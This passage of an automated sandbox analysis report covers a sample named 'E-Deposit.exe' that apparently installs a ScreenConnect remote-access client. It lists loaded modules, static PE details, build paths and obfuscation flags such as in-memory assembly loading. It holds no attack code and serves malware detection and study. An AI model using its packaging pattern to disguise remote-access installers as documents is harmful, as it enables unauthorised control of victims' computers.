                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wkscli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msihnd.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pcacli.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: dpapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: winsta.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: netapi32.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: samcli.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: samlib.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: winnsi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: rasapi32.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: rasman.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: rtutils.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: winhttp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                                  Source: E-Deposit.exeStatic PE information: certificate valid
                                  Source: E-Deposit.exeStatic file information: File size 5627248 > 1048576
                                  Source: E-Deposit.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x533200
                                  Source: E-Deposit.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                  Source: E-Deposit.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                  Source: E-Deposit.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                  Source: E-Deposit.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                  Source: E-Deposit.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                  Source: E-Deposit.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                  Source: E-Deposit.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                  Source: E-Deposit.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.3.dr
                                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb_ source: ScreenConnect.ClientService.exe, 00000008.00000002.3267762212.0000000000987000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: E-Deposit.exe
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: E-Deposit.exe
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: E-Deposit.exe
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.3.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.5.dr
                                  Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.3286003214.00000000024D7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.3281280450.0000000012910000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: E-Deposit.exe, ScreenConnect.Core.dll.5.dr, ScreenConnect.Core.dll.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.3285086355.000000001B5C2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.3284914571.000000001B580000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.3269847777.0000000002901000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.3.dr
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: E-Deposit.exe
                                  Source: Binary string: \??\C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Client.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.3294876651.00000000049F0000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000008.00000000.2053356265.0000000000F7D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: E-Deposit.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000005.00000003.2028961136.0000000004F00000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2027178364.000000000507E000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
                                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.3267762212.0000000000987000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\net20\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.5.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: E-Deposit.exe, 598741.rbs.3.dr, MSI89D0.tmp.3.dr, 598740.msi.3.dr, ScreenConnect.ClientSetup.msi.0.dr, MSI89E1.tmp.3.dr, 598742.msi.3.dr, MSI8F8F.tmp.3.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000005.00000003.2027178364.000000000500F000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.5.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbS] source: E-Deposit.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                                  Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.3286003214.00000000024D7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.3281280450.0000000012910000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2064444724.0000000000772000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                                  Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: E-Deposit.exe, MSI8413.tmp.2.dr, 598740.msi.3.dr, ScreenConnect.ClientSetup.msi.0.dr, 598742.msi.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: ScreenConnect.WindowsClient.exe, 00000009.00000002.3284116635.000000001B222000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbu source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2064444724.0000000000772000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.3284116635.000000001B222000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                                  Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000008.00000002.3286003214.00000000024D7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.3281280450.0000000012910000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: E-Deposit.exe
                                  Source: E-Deposit.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                  Source: E-Deposit.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                  Source: E-Deposit.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                  Source: E-Deposit.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                  Source: E-Deposit.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                                  Data Obfuscation

                                  barindex
                                  Source: 0.2.E-Deposit.exe.3200000.0.raw.unpack, Program.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                                  Source: 0.0.E-Deposit.exe.7e78ec.1.raw.unpack, Program.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                                  Source: ScreenConnect.Client.dll.3.drStatic PE information: 0x94F102E7 [Mon Mar 8 13:28:07 2049 UTC]
                                  Source: MSI8413.tmp.2.drStatic PE information: real checksum: 0x2f213 should be: 0x1125d0
                                  Source: E-Deposit.exeStatic PE information: real checksum: 0x54d1c1 should be: 0x55f625
                                  Source: C:\Users\user\Desktop\E-Deposit.exeCode function: 0_2_014D70B0 push eax; mov dword ptr [esp], ecx0_2_014D70C1
                                  Source: C:\Users\user\Desktop\E-Deposit.exeCode function: 0_2_05B56460 pushfd ; retf 0_2_05B56461
                                  Source: C:\Users\user\Desktop\E-Deposit.exeCode function: 0_2_05B56462 push 8405B2CBh; retf 0_2_05B56469
                                  Source: C:\Users\user\Desktop\E-Deposit.exeCode function: 0_2_05B53AD7 push ebx; retf 0_2_05B53ADA
                                  Source: C:\Users\user\Desktop\E-Deposit.exeCode function: 0_2_05B7495A push eax; mov dword ptr [esp], edx0_2_05B749F4
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeCode function: 8_2_03BD8388 push cs; retn 0003h8_2_03BD839A
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeCode function: 8_2_03BD93FF push esp; retn 0003h8_2_03BD940A
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeCode function: 8_2_03BD9368 push ecx; retn 0003h8_2_03BD9372
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeCode function: 8_2_03BD9497 push ebp; retn 0003h8_2_03BD94A2
